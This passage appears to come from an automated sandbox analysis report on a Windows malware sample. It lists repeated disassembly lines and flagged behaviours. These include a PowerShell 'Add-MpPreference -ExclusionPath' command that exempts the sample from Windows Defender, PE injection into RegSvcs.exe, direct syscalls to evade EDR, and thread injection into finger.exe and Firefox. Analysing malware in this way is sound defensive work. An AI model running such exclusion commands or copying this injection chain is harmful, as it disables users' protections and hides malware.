                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360BBE mov eax, dword ptr fs:[00000030h]4_2_01360BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360BBE mov eax, dword ptr fs:[00000030h]4_2_01360BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]4_2_01358BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]4_2_01358BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]4_2_01358BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137EBFC mov eax, dword ptr fs:[00000030h]4_2_0137EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DCBF0 mov eax, dword ptr fs:[00000030h]4_2_013DCBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013FEBD0 mov eax, dword ptr fs:[00000030h]4_2_013FEBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]4_2_01350BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]4_2_01350BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]4_2_01350BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]4_2_01370BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]4_2_01370BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]4_2_01370BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138CA38 mov eax, dword ptr fs:[00000030h]4_2_0138CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01374A35 mov eax, dword ptr fs:[00000030h]4_2_01374A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01374A35 mov eax, dword ptr fs:[00000030h]4_2_01374A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137EA2E mov eax, dword ptr fs:[00000030h]4_2_0137EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138CA24 mov eax, dword ptr fs:[00000030h]4_2_0138CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DCA11 mov eax, dword ptr fs:[00000030h]4_2_013DCA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CCA72 mov eax, dword ptr fs:[00000030h]4_2_013CCA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CCA72 mov eax, dword ptr fs:[00000030h]4_2_013CCA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]4_2_0138CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]4_2_0138CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]4_2_0138CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360A5B mov eax, dword ptr fs:[00000030h]4_2_01360A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360A5B mov eax, dword ptr fs:[00000030h]4_2_01360A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358AA0 mov eax, dword ptr fs:[00000030h]4_2_01358AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358AA0 mov eax, dword ptr fs:[00000030h]4_2_01358AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013A6AA4 mov eax, dword ptr fs:[00000030h]4_2_013A6AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388A90 mov edx, dword ptr fs:[00000030h]4_2_01388A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424A80 mov eax, dword ptr fs:[00000030h]4_2_01424A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138AAEE mov eax, dword ptr fs:[00000030h]4_2_0138AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138AAEE mov eax, dword ptr fs:[00000030h]4_2_0138AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350AD0 mov eax, dword ptr fs:[00000030h]4_2_01350AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01384AD0 mov eax, dword ptr fs:[00000030h]4_2_01384AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01384AD0 mov eax, dword ptr fs:[00000030h]4_2_01384AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]4_2_013A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]4_2_013A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]4_2_013A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D8D20 mov eax, dword ptr fs:[00000030h]4_2_013D8D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]4_2_01346D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]4_2_01346D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]4_2_01346D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01384D1D mov eax, dword ptr fs:[00000030h]4_2_01384D1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]4_2_0136AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]4_2_0136AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]4_2_0136AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01408D10 mov eax, dword ptr fs:[00000030h]4_2_01408D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01408D10 mov eax, dword ptr fs:[00000030h]4_2_01408D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E8D6B mov eax, dword ptr fs:[00000030h]4_2_013E8D6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]4_2_01358D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]4_2_01358D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]4_2_01358D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]4_2_01358D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]4_2_01358D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]4_2_01350D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]4_2_01350D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]4_2_01350D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01378DBF mov eax, dword ptr fs:[00000030h]4_2_01378DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01378DBF mov eax, dword ptr fs:[00000030h]4_2_01378DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138CDB1 mov ecx, dword ptr fs:[00000030h]4_2_0138CDB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138CDB1 mov eax, dword ptr fs:[00000030h]4_2_0138CDB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138CDB1 mov eax, dword ptr fs:[00000030h]4_2_0138CDB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01386DA0 mov eax, dword ptr fs:[00000030h]4_2_01386DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01346DF6 mov eax, dword ptr fs:[00000030h]4_2_01346DF6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137CDF0 mov eax, dword ptr fs:[00000030h]4_2_0137CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137CDF0 mov ecx, dword ptr fs:[00000030h]4_2_0137CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F0DF0 mov eax, dword ptr fs:[00000030h]4_2_013F0DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F0DF0 mov eax, dword ptr fs:[00000030h]4_2_013F0DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]4_2_0135ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]4_2_0135ADE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtSetInformationThread: Direct from: 0x77D62B4CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtReadVirtualMemory: Direct from: 0x77D62E8CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtCreateKey: Direct from: 0x77D62C6CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtQueryAttributesFile: Direct from: 0x77D62E6CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtQuerySystemInformation: Direct from: 0x77D648CCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtQueryVolumeInformationFile: Direct from: 0x77D62F2CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtAllocateVirtualMemory: Direct from: 0x77D648ECJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtOpenSection: Direct from: 0x77D62E0CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtDeviceIoControlFile: Direct from: 0x77D62AECJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtQuerySystemInformation: Direct from: 0x77D62DFCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtReadFile: Direct from: 0x77D62ADCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtDelayExecution: Direct from: 0x77D62DDCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtQueryInformationProcess: Direct from: 0x77D62C26Jump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtResumeThread: Direct from: 0x77D62FBCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtWriteVirtualMemory: Direct from: 0x77D6490CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtCreateUserProcess: Direct from: 0x77D6371CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtClose: Direct from: 0x77D62B6C
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtAllocateVirtualMemory: Direct from: 0x77D63C9CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtSetInformationProcess: Direct from: 0x77D62C5CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtProtectVirtualMemory: Direct from: 0x77D62F9CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtNotifyChangeKey: Direct from: 0x77D63C2CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtWriteVirtualMemory: Direct from: 0x77D62E3CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtSetInformationThread: Direct from: 0x77D563F9Jump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtCreateMutant: Direct from: 0x77D635CCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtResumeThread: Direct from: 0x77D636ACJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtMapViewOfSection: Direct from: 0x77D62D1CJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtProtectVirtualMemory: Direct from: 0x77D57B2EJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtAllocateVirtualMemory: Direct from: 0x77D62BFCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtAllocateVirtualMemory: Direct from: 0x77D62BECJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtQueryInformationToken: Direct from: 0x77D62CACJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtCreateFile: Direct from: 0x77D62FECJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtOpenFile: Direct from: 0x77D62DCCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtTerminateThread: Direct from: 0x77D62FCCJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtOpenKeyEx: Direct from: 0x77D62B9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 4772Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BDC008Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.993002542.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3339265026.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144432309.0000000000C21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.993002542.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3339265026.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144432309.0000000000C21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.993002542.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3339265026.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144432309.0000000000C21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.993002542.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3339265026.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144432309.0000000000C21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Users\user\Desktop\oss4CtI8oz.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
